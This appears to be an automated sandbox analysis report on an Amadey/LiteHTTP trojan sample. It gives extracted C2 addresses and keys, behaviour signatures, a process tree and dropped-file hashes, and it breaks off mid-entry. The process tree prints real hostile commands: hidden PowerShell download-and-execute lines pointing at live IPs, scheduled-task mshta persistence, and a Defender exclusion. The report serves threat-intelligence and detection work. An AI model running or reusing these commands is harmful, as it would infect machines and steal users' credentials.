Overview

overview

10

Static

static

5

f77181c378...7c.exe

windows7-x64

10

f77181c378...7c.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 21:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe

  • Size

    938KB

  • MD5

    865b70535cac91a7fb0a5e7453798edc

  • SHA1

    bf3e1c9613ef801ad1ff939717bce851cc555282

  • SHA256

    f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c

  • SHA512

    73bf144459c82e83a2cd039d9ca2002268bc8df2aa19ff80fc5d0feb722c8dd38974daad5b8d9a9069d9cf5bb9220582cce1e8fc907f3090677ff2bbd4149138

  • SSDEEP

    24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:ATvC/MTQYxsWR7a0X

Score
10/10
amadeylitehttp092155botdefense_evasiondiscoveryexecutionpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

    stealerbotlitehttp
  • Litehttp family
    litehttp
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
    defense_evasion
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 7 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 11 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 20 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 4 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
    "C:\Users\Admin\AppData\Local\Temp\f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn pf31lmaj1I6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\kJVc9mbRk.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1688
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn pf31lmaj1I6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\kJVc9mbRk.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2940
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\kJVc9mbRk.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1572
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LNOWRJZFTN5FVDHBCTOFOZCO5PGGZIAR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3052
        • C:\Users\Admin\AppData\Local\TempLNOWRJZFTN5FVDHBCTOFOZCO5PGGZIAR.EXE
          "C:\Users\Admin\AppData\Local\TempLNOWRJZFTN5FVDHBCTOFOZCO5PGGZIAR.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2684
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2520
            • C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
              "C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2980
              • C:\Users\Admin\AppData\Local\Temp\onefile_2980_133856843264360000\chromium.exe
                C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2256
            • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
              "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2252
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\4rzWMGyX\Anubis.exe""
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1832
            • C:\Users\Admin\AppData\Local\Temp\10106670101\e6bc895219.exe
              "C:\Users\Admin\AppData\Local\Temp\10106670101\e6bc895219.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2148
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn AVDbvmaT9tC /tr "mshta C:\Users\Admin\AppData\Local\Temp\yOVRebNFW.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2240
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn AVDbvmaT9tC /tr "mshta C:\Users\Admin\AppData\Local\Temp\yOVRebNFW.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1332
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\yOVRebNFW.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:2224
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ACANVAWAQ9CRKX1CMK3AVZHHQ4CWEAOY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2632
                  • C:\Users\Admin\AppData\Local\TempACANVAWAQ9CRKX1CMK3AVZHHQ4CWEAOY.EXE
                    "C:\Users\Admin\AppData\Local\TempACANVAWAQ9CRKX1CMK3AVZHHQ4CWEAOY.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2808
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10106680121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2664
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:2612
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2004
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2012
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2596
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2536
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1680
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2280
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "8sGwtmaLIn2" /tr "mshta \"C:\Temp\gMZT8wqvY.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1600
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\gMZT8wqvY.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2164
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1804
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2980
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10106761121\PcAIvJ0.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2064
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1272
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2056
            • C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
              "C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2344
              • C:\Users\Admin\AppData\Local\Temp\dll32.exe
                "C:\Users\Admin\AppData\Local\Temp\dll32.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:588
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpDF48.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpDF48.tmp.bat
                  8⤵
                    PID:568
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      9⤵
                        PID:2088
                      • C:\Windows\system32\tasklist.exe
                        Tasklist /fi "PID eq 588"
                        9⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1796
                      • C:\Windows\system32\find.exe
                        find ":"
                        9⤵
                          PID:1324
                        • C:\Windows\system32\timeout.exe
                          Timeout /T 1 /Nobreak
                          9⤵
                          • Delays execution with timeout.exe
                          PID:2228
                        • C:\Windows\system32\tasklist.exe
                          Tasklist /fi "PID eq 588"
                          9⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2764
                        • C:\Windows\system32\find.exe
                          find ":"
                          9⤵
                            PID:2744
                          • C:\Windows\system32\timeout.exe
                            Timeout /T 1 /Nobreak
                            9⤵
                            • Delays execution with timeout.exe
                            PID:1616
                          • C:\Windows\system32\tasklist.exe
                            Tasklist /fi "PID eq 588"
                            9⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2476
                          • C:\Windows\system32\find.exe
                            find ":"
                            9⤵
                              PID:940
                            • C:\Windows\system32\timeout.exe
                              Timeout /T 1 /Nobreak
                              9⤵
                              • Delays execution with timeout.exe
                              PID:2584
                      • C:\Users\Admin\AppData\Local\Temp\10106970101\35688f745c.exe
                        "C:\Users\Admin\AppData\Local\Temp\10106970101\35688f745c.exe"
                        6⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2284
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 1200
                          7⤵
                          • Loads dropped DLL
                          • Program crash
                          PID:1316

            Network

            MITRE ATT&CK Enterprise v15

            Reconnaissance

            Resource Development

            Initial Access

            Execution

            Command and Scripting Interpreter

            1
            T1059

            PowerShell

            1
            T1059.001

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Persistence

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Privilege Escalation

            Boot or Logon Autostart Execution

            1
            T1547

            Registry Run Keys / Startup Folder

            1
            T1547.001

            Scheduled Task/Job

            1
            T1053

            Scheduled Task

            1
            T1053.005

            Defense Evasion

            Modify Registry

            2
            T1112

            Virtualization/Sandbox Evasion

            2
            T1497

            Credential Access

            Credentials from Password Stores

            1
            T1555

            Credentials from Web Browsers

            1
            T1555.003

            Unsecured Credentials

            2
            T1552

            Credentials In Files

            2
            T1552.001

            Discovery

            Browser Information Discovery

            1
            T1217

            Process Discovery

            1
            T1057

            Query Registry

            3
            T1012

            System Information Discovery

            2
            T1082

            System Location Discovery

            1
            T1614

            System Language Discovery

            1
            T1614.001

            Virtualization/Sandbox Evasion

            2
            T1497

            Lateral Movement

            Collection

            Data from Local System

            2
            T1005

            Command and Control

            Web Service

            1
            T1102

            Exfiltration

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Temp\gMZT8wqvY.hta
              Filesize

              779B

              MD5

              39c8cd50176057af3728802964f92d49

              SHA1

              68fc10a10997d7ad00142fc0de393fe3500c8017

              SHA256

              f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

              SHA512

              cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
              Filesize

              11.5MB

              MD5

              9da08b49cdcc4a84b4a722d1006c2af8

              SHA1

              7b5af0630b89bd2a19ae32aea30343330ca3a9eb

              SHA256

              215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd

              SHA512

              579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
              Filesize

              48KB

              MD5

              d39df45e0030e02f7e5035386244a523

              SHA1

              9ae72545a0b6004cdab34f56031dc1c8aa146cc9

              SHA256

              df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2

              SHA512

              69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10106670101\e6bc895219.exe
              Filesize

              938KB

              MD5

              15743c2914c612762ee60b2f12678ecf

              SHA1

              b5aedc0e729c59675d5000ef153ea45611ee3dea

              SHA256

              5f7ca62b9d262cf5145711224a4c498739904b721a7131e52bdf9265a441d895

              SHA512

              926c21456df80d22477baa3c03c5bc175a5aeaa9d0b4efd9f211654fdd120b8fa620328c44a3399a0ab2145cc68eb5b881db7360fe818dee3e312c12b4a44aaf

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10106680121\am_no.cmd
              Filesize

              1KB

              MD5

              cedac8d9ac1fbd8d4cfc76ebe20d37f9

              SHA1

              b0db8b540841091f32a91fd8b7abcd81d9632802

              SHA256

              5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

              SHA512

              ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10106761121\PcAIvJ0.cmd
              Filesize

              321B

              MD5

              c471fe8b842145d6b1cf1e88a2a08e97

              SHA1

              103451efb8ff113824e55b0449f73716a5b14c6f

              SHA256

              f556735d16a2f6874e93468ee48d9611083bb0786893c284fba0466e583657ac

              SHA512

              bc63d04142cfe66d3f3df4e54b78e95b73a971618287f50ec9a43e55bf82e64f8932b31cf5cbc359d5c995bc83eff3989bf3922255a419d92169ad939f629f09

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
              Filesize

              15.0MB

              MD5

              35a4dfb5f0308d20b1e5bf26e0a70509

              SHA1

              0c72b35b74dadbce4a95c034968913de271aae06

              SHA256

              40d3baeb6df3e2cd4eed207e773b21989b86ef547de12a748529c2b559025339

              SHA512

              51b8bf5583a256015daaa8caa9c9868c792ef4a1157b89a6880b365c4c5a1c7416abc2b1fcdde9d1d5d9bb7aaa1c617d5b34124a582ec042ac5a2afa064c60d9

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\10106970101\35688f745c.exe
              Filesize

              3.1MB

              MD5

              fd04c991eb10a5f15e684a9fcedeb50f

              SHA1

              e71ff46aa0903316a6d201bdc6cc9ab877d15a1e

              SHA256

              563a5dada30127a4b2c6aa536439601ceeafb512153d1a12a67666f7518f1b50

              SHA512

              c495154170afe875ea5f993cf2acbe8bca6f837214b5a6bccc02826a04420c7860e48ba5553a216f610ff8aeee32f1ffbaedd5c4fee3d63fc506e0b04cc9baf7

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\dll32.exe
              Filesize

              5.7MB

              MD5

              ffb5c5f8bab4598fada3bbf92d02d66d

              SHA1

              ae8096c1f160c97874179ea878a61f69bfb9941a

              SHA256

              f3aa764be17f1a197f94b949cfd88f99c2d67e9fec1f53046ef1b6189f594da1

              SHA512

              902e8a95b964ef3a48504dcdb3c4f0615212eb942476ec26b88e02a39cbaaf866f3fcbe5cd4374342b80aae9a7e17092a28dbe1d53630493a0b0cee8152a4ccf

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\kJVc9mbRk.hta
              Filesize

              717B

              MD5

              57631370a4e95df4a00025772e8dd7a7

              SHA1

              7009c0f5584331f5bec6beb3738c5ad50d35fe15

              SHA256

              044d346f79a4a20a966bca736ac5a7ca1bc899d737343c443c0f1d573066a108

              SHA512

              c45825e48919265275e89e28b8a8101440735b6ac7ec7bc04afb3adc0353d63e51cb0942bfdabf4e02a4c6c779d84d56abdaec751378d126da05e8268a56a9d0

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\onefile_2980_133856843264360000\python312.dll
              Filesize

              6.6MB

              MD5

              166cc2f997cba5fc011820e6b46e8ea7

              SHA1

              d6179213afea084f02566ea190202c752286ca1f

              SHA256

              c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546

              SHA512

              49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\tmpDF48.tmp.bat
              Filesize

              277B

              MD5

              b6c57eae6b6adc04d7eeddf6d4e74c14

              SHA1

              1adc3ab21f62f6ed77268e4b409d85dcea26fb5e

              SHA256

              7dc1e1bdfa5294c406ba1817820932c2ddb81fdd009f40c9611ae2bf6a1d2398

              SHA512

              3589c7a1dca47e96dc114f9b8a31044ea7906e07060f561180b5ff567beb1f4d471ddd7662b0f835efd997782c353e32db7bd5b233b25d3c66542574ed1732e6

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\yOVRebNFW.hta
              Filesize

              717B

              MD5

              f6c2fe9f6b36b7f40976e7ee207b515a

              SHA1

              800303250698c8196badce93c8bea736b70866ed

              SHA256

              9aaa94bebcc14b9417acfcc756986e3ff5f24673669e7513d8c22db0244f432f

              SHA512

              32b5e21873cf514554db99307e85a1bd04f37954f05b2f21be070c51b0f6960282fe10c20d4cacab5af9ba8ccfadfed3ff506eb0429527d015a549b8184813e1

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RO32S3A6OI0NVOZLYRR3.temp
              Filesize

              7KB

              MD5

              e1750b277199a49a23faef5720207ce8

              SHA1

              32736ea6f2039fa3ade32eff0e5a1ea553be013a

              SHA256

              52fcd09c5ff69a7fd3cedbad7ea591aaaf36a0742d6bdfd511d4a832a7d7b90b

              SHA512

              d3e5287d41715fa458ba75dc0b8289610c80665e477dd46ea82ebb59b2745af61032f8ae94e6e741f2b7bc139057afc6bc16b698ace3c84960afd872f33b3a75

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              Filesize

              7KB

              MD5

              e783db5f65540070c49053b9ff1cc88c

              SHA1

              4e67a309bd45ede41f70dc1c4ef036efc0f7d2fc

              SHA256

              378c61016e52f650515b1b27a57bdaf809e9c33e0b155bff22aa7616fe7c41f4

              SHA512

              abce6051b0d8daebbec128d5920e070d892ac478042624f207dc4ba468e7d40aa471cd1914b77f726b6fe8713de3bd4b0e9ee47b1aec86982825d6f4841372d4

              Download Submit

            • \Users\Admin\AppData\Local\TempLNOWRJZFTN5FVDHBCTOFOZCO5PGGZIAR.EXE
              Filesize

              1.8MB

              MD5

              09e00631d85ee0955f01a859559615f7

              SHA1

              fdfcd6e6a51797322526ad74f7cb0050c9d3e6b5

              SHA256

              f62908ccaf5e61f223f3e1a7a8d1351dd61327afdd5263b4084f58ad1bd45297

              SHA512

              079bafcff76d5ec1bc14bdb39b15de51e30e3cfb02a0155625ddb9207d908b07a04f12e39b6a0e6952129efc598697957c0d1b72beb1a52aa752ff9b14619e34

              Download Submit

            • \Users\Admin\AppData\Local\Temp\Costura\05A92EC28EDC5561548638CAA951F864\64\sqlite.interop.dll
              Filesize

              1.7MB

              MD5

              65ccd6ecb99899083d43f7c24eb8f869

              SHA1

              27037a9470cc5ed177c0b6688495f3a51996a023

              SHA256

              aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

              SHA512

              533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

              Download Submit

            • \Users\Admin\AppData\Local\Temp\onefile_2980_133856843264360000\chromium.exe
              Filesize

              22.0MB

              MD5

              0eb68c59eac29b84f81ad6522d396f59

              SHA1

              aacfdf3cb1bdd995f63584f31526b11874fc76a5

              SHA256

